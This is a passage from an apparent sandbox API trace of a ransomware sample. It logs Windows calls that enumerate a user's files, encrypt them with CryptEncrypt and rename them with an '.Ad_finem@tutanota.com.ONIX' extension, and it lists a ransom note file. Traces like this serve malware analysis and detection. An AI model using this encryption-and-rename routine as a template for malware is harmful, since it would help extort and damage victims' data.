nNumberOfBytesToUnlockLow=0x8ebd, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.358] CloseHandle (hObject=0x524) returned 1 [0129.358] GetProcessHeap () returned 0x410000 [0129.359] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.359] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\O1ywiPju8Yfy.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\o1ywipju8yfy.mp3"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\O1ywiPju8Yfy.mp3.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\o1ywipju8yfy.mp3.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.362] GetProcessHeap () returned 0x410000 [0129.362] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.362] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x547cb1b0, ftCreationTime.dwHighDateTime=0x1d5e0dd, ftLastAccessTime.dwLowDateTime=0x371ac7f0, ftLastAccessTime.dwHighDateTime=0x1d5e47b, ftLastWriteTime.dwLowDateTime=0x371ac7f0, ftLastWriteTime.dwHighDateTime=0x1d5e47b, nFileSizeHigh=0x0, nFileSizeLow=0x129e5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sQrG.mkv", cAlternateFileName="")) returned 1 [0129.362] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sQrG.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sqrg.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.362] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.362] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x129e5, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.362] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.362] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.363] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.363] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.363] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.363] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.363] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sQrG.mkv", dwFileAttributes=0x80) returned 1 [0129.364] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sQrG.mkv") returned 55 [0129.364] GetProcessHeap () returned 0x410000 [0129.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xde) returned 0x461440 [0129.364] lstrcpyW (in: lpString1=0x461440, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sQrG.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sQrG.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sQrG.mkv" [0129.364] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sQrG.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sQrG.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sQrG.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.364] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=76261) returned 1 [0129.364] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x129e5 [0129.364] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.364] GetProcessHeap () returned 0x410000 [0129.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.364] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.364] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.366] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.367] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.368] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x129e5) returned 0xf70048 [0129.368] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x129e5) returned 0xf82a38 [0129.369] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.369] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x129e5, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x129e5, lpOverlapped=0x0) returned 1 [0129.372] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x129e5, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.372] CloseHandle (hObject=0x524) returned 1 [0129.372] GetProcessHeap () returned 0x410000 [0129.372] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.372] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sQrG.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sqrg.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\sQrG.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\sqrg.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.376] GetProcessHeap () returned 0x410000 [0129.376] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0129.376] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3283a610, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3283a610, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x51034410, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0129.376] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74896440, ftCreationTime.dwHighDateTime=0x1d5deac, ftLastAccessTime.dwLowDateTime=0x518d7e10, ftLastAccessTime.dwHighDateTime=0x1d5d8e7, ftLastWriteTime.dwLowDateTime=0x518d7e10, ftLastWriteTime.dwHighDateTime=0x1d5d8e7, nFileSizeHigh=0x0, nFileSizeLow=0xd43e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tSTvPRU88QTb.xls", cAlternateFileName="TSTVPR~1.XLS")) returned 1 [0129.376] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tSTvPRU88QTb.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tstvpru88qtb.xls"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.376] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.376] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd43e, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.376] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.376] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.377] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.377] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.377] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.377] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.377] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tSTvPRU88QTb.xls", dwFileAttributes=0x80) returned 1 [0129.378] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tSTvPRU88QTb.xls") returned 63 [0129.378] GetProcessHeap () returned 0x410000 [0129.378] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xee) returned 0x431d68 [0129.378] lstrcpyW (in: lpString1=0x431d68, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tSTvPRU88QTb.xls" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tSTvPRU88QTb.xls") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tSTvPRU88QTb.xls" [0129.378] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tSTvPRU88QTb.xls", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tSTvPRU88QTb.xls.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tSTvPRU88QTb.xls.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.378] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=54334) returned 1 [0129.378] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd43e [0129.378] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.378] GetProcessHeap () returned 0x410000 [0129.378] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.378] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.378] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.380] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.381] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.382] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd43e) returned 0xf70048 [0129.382] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd43e) returned 0xf7d490 [0129.383] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.383] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0xd43e, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0xd43e, lpOverlapped=0x0) returned 1 [0129.386] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd43e, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.386] CloseHandle (hObject=0x524) returned 1 [0129.386] GetProcessHeap () returned 0x410000 [0129.386] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.386] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tSTvPRU88QTb.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tstvpru88qtb.xls"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\tSTvPRU88QTb.xls.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\tstvpru88qtb.xls.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.389] GetProcessHeap () returned 0x410000 [0129.389] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x431d68 | out: hHeap=0x410000) returned 1 [0129.390] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x664e4a90, ftCreationTime.dwHighDateTime=0x1d5dbb8, ftLastAccessTime.dwLowDateTime=0x925a1c70, ftLastAccessTime.dwHighDateTime=0x1d5dedf, ftLastWriteTime.dwLowDateTime=0x925a1c70, ftLastWriteTime.dwHighDateTime=0x1d5dedf, nFileSizeHigh=0x0, nFileSizeLow=0x11464, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T_IQbGF.doc", cAlternateFileName="")) returned 1 [0129.390] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T_IQbGF.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\t_iqbgf.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.390] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.390] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x11464, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.390] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.390] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.391] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.391] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.391] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.391] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.391] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T_IQbGF.doc", dwFileAttributes=0x80) returned 1 [0129.391] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T_IQbGF.doc") returned 58 [0129.391] GetProcessHeap () returned 0x410000 [0129.391] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe4) returned 0x467908 [0129.391] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T_IQbGF.doc" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T_IQbGF.doc") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T_IQbGF.doc" [0129.391] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T_IQbGF.doc", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T_IQbGF.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T_IQbGF.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.391] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=70756) returned 1 [0129.391] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x11464 [0129.391] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.391] GetProcessHeap () returned 0x410000 [0129.392] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.392] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0129.392] WriteFile (in: hFile=0x524, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0129.394] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0129.395] WriteFile (in: hFile=0x524, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0129.396] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11464) returned 0xf70048 [0129.397] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11464) returned 0xf814b8 [0129.397] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.397] ReadFile (in: hFile=0x524, lpBuffer=0xf70048, nNumberOfBytesToRead=0x11464, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf70048*, lpNumberOfBytesRead=0x367f44c*=0x11464, lpOverlapped=0x0) returned 1 [0129.400] UnlockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x11464, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0129.400] CloseHandle (hObject=0x524) returned 1 [0129.401] GetProcessHeap () returned 0x410000 [0129.401] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0129.401] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T_IQbGF.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\t_iqbgf.doc"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\T_IQbGF.doc.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\t_iqbgf.doc.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0129.404] GetProcessHeap () returned 0x410000 [0129.404] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0129.404] FindNextFileW (in: hFindFile=0x4e0e40, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x37f39520, ftCreationTime.dwHighDateTime=0x1d5e783, ftLastAccessTime.dwLowDateTime=0xb638f530, ftLastAccessTime.dwHighDateTime=0x1d5e3cb, ftLastWriteTime.dwLowDateTime=0xb638f530, ftLastWriteTime.dwHighDateTime=0x1d5e3cb, nFileSizeHigh=0x0, nFileSizeLow=0x51de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uuuCKMh46.mkv", cAlternateFileName="UUUCKM~1.MKV")) returned 1 [0129.404] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uuuCKMh46.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uuuckmh46.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x524 [0129.404] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0129.404] LockFile (hFile=0x524, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x51de, nNumberOfBytesToLockHigh=0x0) returned 1 [0129.404] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0129.404] ReadFile (in: hFile=0x524, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0129.405] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0129.405] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.405] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0129.405] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0129.405] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uuuCKMh46.mkv", dwFileAttributes=0x80) returned 1 [0129.406] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uuuCKMh46.mkv") returned 60 [0129.406] GetProcessHeap () returned 0x410000 [0129.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe8) returned 0x467908 [0129.406] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uuuCKMh46.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uuuCKMh46.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uuuCKMh46.mkv" [0129.406] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uuuCKMh46.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uuuCKMh46.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\uuuCKMh46.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0129.406] GetFileSizeEx (in: hFile=0x524, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=20958) returned 1 [0129.406] SetFilePointer (in: hFile=0x524, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x51de [0129.406] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0129.406] GetProcessHeap () returned 0x410000 [0129.406] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0129.406] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, 